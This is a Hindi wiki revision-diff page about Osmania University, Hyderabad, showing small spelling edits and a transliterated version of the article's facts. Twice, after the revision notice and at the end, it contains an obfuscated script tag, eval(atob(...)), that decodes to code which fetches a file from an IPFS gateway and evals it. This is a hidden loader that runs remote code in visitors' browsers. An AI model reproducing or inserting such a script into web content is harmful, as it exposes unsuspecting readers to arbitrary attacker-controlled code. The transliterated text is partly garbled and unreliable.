Difference between revisions of "उस्मानिया विश्वविद्यालय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " सन " to " सन् ")
m (Text replace - "कालेज " to "कॉलेज ")
Line 5: Line 5:
 
*उस्मानिया विश्वविद्यालय [[भारत]] के पुराने विश्वविद्यालयों में से एक है।
 
*उस्मानिया विश्वविद्यालय [[भारत]] के पुराने विश्वविद्यालयों में से एक है।
 
*उस्मानिया विश्वविद्यालय लगभग 1600 एकड़ में फैला हुआ है और यहाँ लगभग 3 लाख छात्र और छात्राएँ शिक्षा का अध्यन करते है।
 
*उस्मानिया विश्वविद्यालय लगभग 1600 एकड़ में फैला हुआ है और यहाँ लगभग 3 लाख छात्र और छात्राएँ शिक्षा का अध्यन करते है।
*उस्मानिया विश्वविद्यालय उच्चन्यायालय, सिटी कालेज और मूसा नदी के किनारे फैले पब्लिक उद्यानों से घिरा है।  
+
*उस्मानिया विश्वविद्यालय उच्चन्यायालय, सिटी कॉलेज और मूसा नदी के किनारे फैले पब्लिक उद्यानों से घिरा है।  
 
*उस्मानिया विश्वविद्यालय हिंदू और मुस्लिम स्थापत्य कला शैली का मिश्रण है।
 
*उस्मानिया विश्वविद्यालय हिंदू और मुस्लिम स्थापत्य कला शैली का मिश्रण है।
  

Revision as of 12:59, 24 March 2012

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

[[chitr:Osmania-University-Hyderabad.jpg|thumb|250px|usmaniya vishvavidyalay, haidarabad]] usmaniya vishvavidyalay aandhr pradesh ki rajadhani haidarabad mean mahatvapoorn shiksha keandroan mean se ek hai.

  • usmaniya vishvavidyalay ka nirman haidarabad ke akhiri nizam aur mir usman ali khan ne sanh 1918 mean karavaya tha.
  • usmaniya vishvavidyalay bharat ke purane vishvavidyalayoan mean se ek hai.
  • usmaniya vishvavidyalay lagabhag 1600 ek d mean phaila hua hai aur yahaan lagabhag 3 lakh chhatr aur chhatraean shiksha ka adhyan karate hai.
  • usmaniya vishvavidyalay uchchanyayalay, siti k aaulej aur moosa nadi ke kinare phaile pablik udyanoan se ghira hai.
  • usmaniya vishvavidyalay hiandoo aur muslim sthapaty kala shaili ka mishran hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


bahari k diyaan

usmaniya vishvavidyalay

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>